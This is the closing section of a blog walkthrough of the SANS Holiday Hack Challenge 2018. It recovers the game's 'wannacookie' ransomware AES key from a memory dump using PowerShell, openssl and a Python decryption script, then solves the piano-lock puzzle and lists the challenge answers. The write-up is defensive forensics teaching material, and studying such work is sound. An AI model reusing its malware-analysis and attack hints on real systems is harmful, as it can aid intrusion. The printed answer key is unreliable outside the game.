&lt;span class="go"&gt;uGmaIcj6Nzdzr+7EBOWZumjy5WWPrSe0S6Ld4lTcFdaXolUEHkE0E0j7H8M+dKG2&lt;/span&gt;
&lt;span class="go"&gt;Emz3zaJNiAIX89UcvelrXTV00k+kMYItvHWchdiH64EOjsWrc8co9WNgK1XlLQtG&lt;/span&gt;
&lt;span class="go"&gt;4iBpErVctbOcjJlzv1zXgUiyTQKBgQDaxRoQolzgjElDG/T3VsC81jO6jdatRpXB&lt;/span&gt;
&lt;span class="go"&gt;0URM8/4MB/vRAL8LB834ZKhnSNyzgh9N5G9/TAB9qJJ+4RYlUUOVIhK+8t863498&lt;/span&gt;
&lt;span class="go"&gt;/P4sKNlPQio4Ld3lfnT92xpZU1hYfyRPQ29rcim2c173KDMPcO6gXTezDCa1h64Q&lt;/span&gt;
&lt;span class="go"&gt;8iskC4iSwQKBgQCvwq3f40HyqNE9YVRlmRhryUI1qBli+qP5ftySHhqy94okwerE&lt;/span&gt;
&lt;span class="go"&gt;KcHw3VaJVM9J17Atk4m1aL+v3Fh01OH5qh9JSwitRDKFZ74JV0Ka4QNHoqtnCsc4&lt;/span&gt;
&lt;span class="go"&gt;eP1RgCE5z0w0efyrybH9pXwrNTNSEJi7tXmbk8azcdIw5GsqQKeNs6qBSQKBgH1v&lt;/span&gt;
&lt;span class="go"&gt;sC9DeS+DIGqrN/0tr9tWklhwBVxa8XktDRV2fP7XAQroe6HOesnmpSx7eZgvjtVx&lt;/span&gt;
&lt;span class="go"&gt;moCJympCYqT/WFxTSQXUgJ0d0uMF1lcbFH2relZYoK6PlgCFTn1TyLrY7/nmBKKy&lt;/span&gt;
&lt;span class="go"&gt;DsuzrLkhU50xXn2HCjvG1y4BVJyXTDYJNLU5K7jBAoGBAMMxIo7+9otN8hWxnqe4&lt;/span&gt;
&lt;span class="go"&gt;Ie0RAqOWkBvZPQ7mEDeRC5hRhfCjn9w6G+2+/7dGlKiOTC3Qn3wz8QoG4v5xAqXE&lt;/span&gt;
&lt;span class="go"&gt;JKBn972KvO0eQ5niYehG4yBaImHH+h6NVBlFd0GJ5VhzaBJyoOk+KnOnvVYbrGBq&lt;/span&gt;
&lt;span class="go"&gt;UdrzXvSwyFuuIqBlkHnWSIeC&lt;/span&gt;
&lt;span class="go"&gt;-----END PRIVATE KEY-----&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Awesome! We now have the ransomware's private key! We can use it to recover our
AES key. But first, we must find our encrypted AES key in our memory dump. To
know what we're looking for, let's encrypt a fake AES key using the
ransomware's source code and public key, to see the result:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS C:\&amp;gt; &lt;/span&gt;&lt;span class="nv"&gt;$p_k&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="no"&gt;[System.Convert]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;FromBase64String&lt;/span&gt;&lt;span class="p"&gt;($(&lt;/span&gt;&lt;span class="n"&gt;g_o_dns&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;7365727665722E637274&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)));&lt;/span&gt;
&lt;span class="gp"&gt;PS C:\&amp;gt; &lt;/span&gt;&lt;span class="nv"&gt;$b_k&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="p"&gt;@(&lt;/span&gt;&lt;span class="n"&gt;1&lt;/span&gt;&lt;span class="p"&gt;..&lt;/span&gt;&lt;span class="n"&gt;16&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="gp"&gt;PS C:\&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;p_k_e&lt;/span&gt; &lt;span class="nv"&gt;$b_k&lt;/span&gt; &lt;span class="nv"&gt;$p_k&lt;/span&gt;
&lt;span class="go"&gt;b9554cb7ea6ff46c689d90a8d42fc9b9692552d42b6ca34c8aa4593602e7d0cbef88d5dda935960c4ab4e92d789e290c58bf1a280ca9bbf502a8c43ad0eba242e2c8000d5e81fb73aa381dff97cf58c51bb1a49d3a54c15a4de84cf3029cc9dba7364ccc78e95058480f25719cb6aa7763469175dadd031113f6f64ba461adb5303a5c65cb6260bf1ca24eed4e251a99f4219cee6f35aa166e29c3215381bfecd0f9b3eded6acfeeaf8695f55b8e3741c8ca365f8a81560fb92e1bddb11b1bb19399b0a377dd5226e0930ea812c8c151382a7508aab93b4a9f19535fa2808b23520f249bb63d747f3e49a4b279a3cafcadba4daa2175b35d8841def66a2abfd4&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright, the encrypted key we're looking for seems to be a 512-byte long hex
representation. Let's use &lt;code&gt;strings&lt;/code&gt; and &lt;code&gt;grep&lt;/code&gt; to look for
something like this in the memory dump:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; strings -e b powershell.exe_181109_104716.dmp&lt;span class="p"&gt;|&lt;/span&gt; grep -E &lt;span class="s1"&gt;&amp;#39;^[0-9a-f]{512}$&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;3cf903522e1a3966805b50e7f7dd51dc7969c73cfb1663a75a56ebf4aa4a1849d1949005437dc44b8464dca05680d531b7a971672d87b24b7a6d672d1d811e6c34f42b2f8d7f2b43aab698b537d2df2f401c2a09fbe24c5833d2c5861139c4b4d3147abb55e671d0cac709d1cfe86860b6417bf019789950d0bf8d83218a56e69309a2bb17dcede7abfffd065ee0491b379be44029ca4321e60407d44e6e381691dae5e551cb2354727ac257d977722188a946c75a295e714b668109d75c00100b94861678ea16f8b79b756e45776d29268af1720bc49995217d814ffd1e4b6edce9ee57976f9ab398f9a8479cf911d7d47681a77152563906a2c29c6d12f971&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We got a unique match! This may be our luck. Let's hex-decode this string, and
try to decrypt it. To decrypt it, I'll use &lt;code&gt;openssl&lt;/code&gt; to generate a full
certificate, with combined public and private keys in a single file. The
resulting &lt;code&gt;.pfx&lt;/code&gt; file won't have any passphrase:&lt;/p&gt;
&lt;p&gt;&lt;em&gt;NB: Before that, make sure that you add&lt;/em&gt; &lt;code&gt;-----BEGIN CERTIFICATE-----&lt;/code&gt;
&lt;em&gt;and&lt;/em&gt; &lt;code&gt;-----END CERTIFICATE-----&lt;/code&gt; &lt;em&gt;in the public key file.&lt;/em&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; strings -e b powershell.exe_181109_104716.dmp&lt;span class="p"&gt;|&lt;/span&gt; grep -E &lt;span class="s1"&gt;&amp;#39;^[0-9a-f]{512}$&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; xxd -p -r &amp;gt; encrypted_aes_key.raw
&lt;span class="gp"&gt;$&lt;/span&gt; openssl pkcs12 -export -in ./public.cer -inkey ./private.key -out wannacookie_cert.pfx
&lt;span class="go"&gt;Enter Export Password:&lt;/span&gt;
&lt;span class="go"&gt;Verifying - Enter Export Password:&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now let's decrypt this key:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS C:\&amp;gt; &lt;/span&gt;&lt;span class="nv"&gt;$wannacookie_cert&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;New-Object&lt;/span&gt; &lt;span class="n"&gt;System&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Security&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Cryptography&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;X509Certificates&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;X509Certificate2&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;C:\path\to\wannacookie_cert.pfx&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="gp"&gt;PS C:\&amp;gt; &lt;/span&gt;&lt;span class="nv"&gt;$key_bytes&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="no"&gt;[System.IO.File]&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;&lt;span class="n"&gt;ReadAllBytes&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;C:\path\to\encrypted_aes_key.raw&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="gp"&gt;PS C:\&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;B2H&lt;/span&gt; &lt;span class="p"&gt;$(&lt;/span&gt;&lt;span class="nv"&gt;$wannacookie_cert&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;PrivateKey&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Decrypt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;$key_bytes&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;$true&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;fbcfc121915d99cc20a3d3d5d84f8308&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We have our decrypted key (well, &lt;em&gt;a&lt;/em&gt; decrypted key). Let's see if it works.
Since I loath PowerShell's syntax, I'm using a little Python script to decrypt
Alabaster's password database:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="ch"&gt;#!/usr/bin/env python&lt;/span&gt;

&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;sys&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;struct&lt;/span&gt;
&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="nn"&gt;Crypto.Cipher&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;AES&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="nb"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="k"&gt;print&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;Usage: {} &amp;lt;file_to_decrypt&amp;gt; &amp;lt;key&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
        &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;exit&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="n"&gt;encrypted_file&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
    &lt;span class="n"&gt;decrypted_file&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;encrypted_file&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;replace&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;.wannacookie&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nb"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;encrypted_file&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;rb&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="c1"&gt;# We read 4 bytes to get the IV&amp;#39;s size&lt;/span&gt;
        &lt;span class="n"&gt;iv_size&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;struct&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;unpack&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;lt;i&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;read&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;))[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;

        &lt;span class="c1"&gt;# We read the IV&lt;/span&gt;
        &lt;span class="n"&gt;iv&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;read&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;iv_size&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# We read the rest of the file&lt;/span&gt;
        &lt;span class="n"&gt;encrypted_content&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;read&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

    &lt;span class="n"&gt;key&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sys&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;argv&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;hex&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="n"&gt;aes&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;AES&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;new&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;AES&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;MODE_CBC&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;iv&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="n"&gt;decrypted_content&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;aes&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;decrypt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;encrypted_content&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
    &lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nb"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;decrypted_file&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;wb&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;decrypted_content&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="vm"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;__main__&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; ./decrypt_wannacookie.py ./alabaster_passwords.elfdb.wannacookie fbcfc121915d99cc20a3d3d5d84f8308
&lt;span class="gp"&gt;$&lt;/span&gt; file alabaster_passwords.elfdb
&lt;span class="go"&gt;alabaster_passwords.elfdb: SQLite 3.x database, last written using SQLite version 3015002&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Finally!&lt;/strong&gt; We have our decrypted file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; sqlite3 ./alabaster_passwords.elfdb
&lt;span class="go"&gt;SQLite version 3.22.0 2018-01-22 18:45:57&lt;/span&gt;
&lt;span class="go"&gt;Enter &amp;quot;.help&amp;quot; for usage hints.&lt;/span&gt;
&lt;span class="go"&gt;sqlite&amp;gt; .schema&lt;/span&gt;
&lt;span class="go"&gt;CREATE TABLE IF NOT EXISTS &amp;quot;passwords&amp;quot; (&lt;/span&gt;
&lt;span class="go"&gt;    `name`    TEXT NOT NULL,&lt;/span&gt;
&lt;span class="go"&gt;    `password`    TEXT NOT NULL,&lt;/span&gt;
&lt;span class="go"&gt;    `usedfor`    TEXT NOT NULL&lt;/span&gt;
&lt;span class="go"&gt;);&lt;/span&gt;
&lt;span class="go"&gt;sqlite&amp;gt; select * from passwords where usedfor=&amp;quot;vault&amp;quot;;&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;alabaster.snowball|ED#ED#EED#EF#G#F#G#ABA#BA#B|vault&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We finally find the final password: &lt;code&gt;ED#ED#EED#EF#G#F#G#ABA#BA#B&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="who-is-behind-it-all"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id46"&gt;Who Is Behind It All?&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Using Alabaster's password, we can now try to enter Santa's vault. We just have
to play the tune on the piano lock and...&lt;/p&gt;
&lt;img alt="pianolock_fail.png" class="align-center" src="/images/sans-christmas-challenge-2018/pianolock_fail.png" /&gt;
&lt;p&gt;Damn! This isn't the right key! If you remember Holy Evergreen's document on
music transposition, Alabster likes song in the key of D major. Now, we just
have to find what's the key of the original song.&lt;/p&gt;
&lt;p&gt;We can use the following rules of thumb:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;What's the first note? E.&lt;/li&gt;
&lt;li&gt;What's the most common note? E.&lt;/li&gt;
&lt;li&gt;What's the last note? B.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The two first rules hint that this is in the key of E. Indeed, every note in
the password fit in the &lt;a class="reference external" href="https://en.wikipedia.org/wiki/E_major"&gt;E major scale&lt;/a&gt;
(well, except for the borrowed A♯).&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Note: this is by no means a fool-proof method to identify the key of a song,
but it can be handy.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;So, the song is in E major, and we want it in D major. D is a whole step below
E, so we must take every note in the song, and move them down one whole step.
This gives us &lt;code&gt;DC#DC#DDC#DEF#EF#GAG#AG#A&lt;/code&gt;. We can now play this on the
piano lock:&lt;/p&gt;
&lt;img alt="pianolock_success.png" class="align-center" src="/images/sans-christmas-challenge-2018/pianolock_success.png" /&gt;
&lt;p&gt;This gives us the message &lt;code&gt;You have unlocked Santa's vault!&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Success! We now have access to Santa's vault. Now, to find who is behind it
all. We go inside the vault and we find... Hans? And Santa?!&lt;/p&gt;
&lt;img alt="alabaster.png" class="align-center" src="/images/sans-christmas-challenge-2018/alabaster.png" /&gt;
&lt;p&gt;&lt;em&gt;Alabaster says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;I'm seriously impressed by your security skills!&lt;/p&gt;
&lt;p&gt;How could I forget that I used Rachmaninoff as my musical password?&lt;/p&gt;
&lt;p&gt;Of course I transposed it it before I entered it into my database for extra
security.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Alabaster steps aside, revealing two familiar, smiling faces.&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;img alt="hans_smile.png" class="align-center" src="/images/sans-christmas-challenge-2018/hans_smile.png" /&gt;
&lt;p&gt;&lt;em&gt;Hans says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;It’s a pleasure to see you again.&lt;/p&gt;
&lt;p&gt;Congratulations.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;img alt="santa.png" class="align-center" src="/images/sans-christmas-challenge-2018/santa.png" /&gt;
&lt;p&gt;&lt;em&gt;Santa says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;You DID IT! You completed the hardest challenge. You see, Hans and the
soldiers work for ME. I had to test you. And you passed the test!&lt;/p&gt;
&lt;p&gt;You WON! Won what, you ask? Well, the jackpot, my dear! The grand and
glorious jackpot!&lt;/p&gt;
&lt;p&gt;You see, I finally found you!&lt;/p&gt;
&lt;p&gt;I came up with the idea of KringleCon to find someone like you who could
help me defend the North Pole against even the craftiest attackers.&lt;/p&gt;
&lt;p&gt;That’s why we had so many different challenges this year.&lt;/p&gt;
&lt;p&gt;We needed to find someone with skills all across the spectrum.&lt;/p&gt;
&lt;p&gt;I asked my friend Hans to play the role of the bad guy to see if you could
solve all those challenges and thwart the plot we devised.&lt;/p&gt;
&lt;p&gt;And you did!&lt;/p&gt;
&lt;p&gt;Oh, and those brutish toy soldiers? They are really just some of my elves
in disguise.&lt;/p&gt;
&lt;p&gt;See what happens when they take off those hats?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;img alt="toy_soldier_green_no_hat.png" class="align-center" src="/images/sans-christmas-challenge-2018/toy_soldier_green_no_hat.png" /&gt;
&lt;img alt="santa.png" class="align-center" src="/images/sans-christmas-challenge-2018/santa.png" /&gt;
&lt;p&gt;&lt;em&gt;Santa continues&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Based on your victory… next year, I’m going to ask for your help in
defending my whole operation from evil bad guys.&lt;/p&gt;
&lt;p&gt;And welcome to my vault room. Where's my treasure? Well, my treasure is
Christmas joy and good will.&lt;/p&gt;
&lt;p&gt;You did such a GREAT job! And remember what happened to the people who
suddenly got everything they ever wanted?&lt;/p&gt;
&lt;p&gt;They lived happily ever after.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Thank you, Santa!&lt;/p&gt;
&lt;img alt="santas_vault_selfie.png" class="align-center" src="/images/sans-christmas-challenge-2018/santas_vault_selfie.png" /&gt;
&lt;/div&gt;
&lt;div class="section" id="answers-to-the-questions"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id47"&gt;Answers to the questions&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Let's answer the questions:&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;What phrase is revealed when you answer all of the &lt;a class="reference external" href="https://www.holidayhackchallenge.com/2018/challenges/osint_challenge_windows.html"&gt;KringleCon Holiday Hack
History questions&lt;/a&gt;?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The phrase revealed is &lt;code&gt;Happy Trails&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="2"&gt;
&lt;li&gt;Who submitted (First Last) the rejected talk titled &lt;strong&gt;Data Loss for Rainbow
Teams: A Path in the Darkness&lt;/strong&gt;?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The talk was submitted by John McClane.&lt;/p&gt;
&lt;ol class="arabic simple" start="3"&gt;
&lt;li&gt;The KringleCon Speaker Unpreparedness room is a place for frantic speakers
to furiously complete their presentations. The room is protected by a door
passcode. Upon entering the correct passcode, what message is presented to
the speaker?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The message is &lt;code&gt;Welcome unprepared speaker!&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="4"&gt;
&lt;li&gt;Retrieve the encrypted ZIP file from the North Pole Git repository. What is
the password to open this file?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The password is &lt;code&gt;Yippee-ki-yay&lt;/code&gt;, motherf*cker.&lt;/p&gt;
&lt;ol class="arabic simple" start="5"&gt;
&lt;li&gt;Using the data set contained in this &lt;a class="reference external" href="https://download.holidayhackchallenge.com/HHC2018-DomainHack_2018-12-19.ova"&gt;SANS Slingshot Linux image&lt;/a&gt;,
find a reliable path from a Kerberoastable user to the Domain Admins group.
What’s the user’s logon name (in &lt;a class="reference external" href="mailto:username&amp;#64;domain.tld"&gt;username&amp;#64;domain.tld&lt;/a&gt; format)?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The user is &lt;code&gt;LDUBEJ00320&amp;#64;AD.KRINGLECASTLE.COM&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="6"&gt;
&lt;li&gt;Bypass the authentication mechanism associated with the room near Pepper
Minstix. &lt;a class="reference external" href="https://www.holidayhackchallenge.com/2018/challenges/alabaster_badge.jpg"&gt;A sample employee badge is available&lt;/a&gt;.
What is the access control number revealed by the &lt;a class="reference external" href="https://scanomatic.kringlecastle.com/index.html"&gt;door authentication
panel&lt;/a&gt;?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The access control number is &lt;code&gt;19880715&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="7"&gt;
&lt;li&gt;Santa uses an Elf Resources website to look for talented information
security professionals. &lt;a class="reference external" href="https://careers.kringlecastle.com/"&gt;Gain access to the website&lt;/a&gt; and fetch the document
&lt;code&gt;C:\candidate_evaluation.docx&lt;/code&gt;. Which terrorist organization is
secretly supported by the job applicant whose name begins with &amp;quot;K&amp;quot;?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The terrorist organization is &lt;code&gt;Fancy Beaver&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="8"&gt;
&lt;li&gt;Santa has introduced a &lt;a class="reference external" href="https://packalyzer.kringlecastle.com/"&gt;web-based packet capture and analysis tool&lt;/a&gt; to support the elves and their
information security work. Using the system, access and decrypt HTTP/2
network activity. What is the name of the song described in the document
sent from Holly Evergreen to Alabaster Snowball?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The song is &lt;code&gt;Mary Had a Little Lamb&lt;/code&gt;.&lt;/p&gt;
&lt;ol class="arabic simple" start="9"&gt;
&lt;li&gt;Alabaster Snowball is in dire need of your help. Santa's file server has
been hit with malware. Help Alabaster Snowball deal with the malware on
Santa's server by completing several tasks. To start, assist Alabaster by
accessing (clicking) the snort terminal below. Then create a rule that will
catch all new infections. What is the success message displayed by the Snort
terminal?&lt;/li&gt;
&lt;/ol&gt;
